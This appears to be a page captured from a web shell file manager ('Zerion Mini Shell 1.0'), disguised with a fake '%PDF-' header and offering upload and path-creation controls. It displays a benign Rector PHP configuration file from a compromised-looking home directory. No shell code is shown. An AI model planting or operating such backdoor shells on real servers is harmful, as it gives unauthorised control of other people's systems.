%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/code/vendor/rector/rector/config/set/
Upload File :
Create Path :
Current File : /home/vacivi36/code/vendor/rector/rector/config/set/php53.php

<?php

declare (strict_types=1);
namespace RectorPrefix202209;

use Rector\Config\RectorConfig;
use Rector\Php53\Rector\FuncCall\DirNameFileConstantToDirConstantRector;
use Rector\Php53\Rector\Ternary\TernaryToElvisRector;
use Rector\Php53\Rector\Variable\ReplaceHttpServerVarsByServerRector;
return static function (RectorConfig $rectorConfig) : void {
    $rectorConfig->rule(TernaryToElvisRector::class);
    $rectorConfig->rule(DirNameFileConstantToDirConstantRector::class);
    $rectorConfig->rule(ReplaceHttpServerVarsByServerRector::class);
};

Zerion Mini Shell 1.0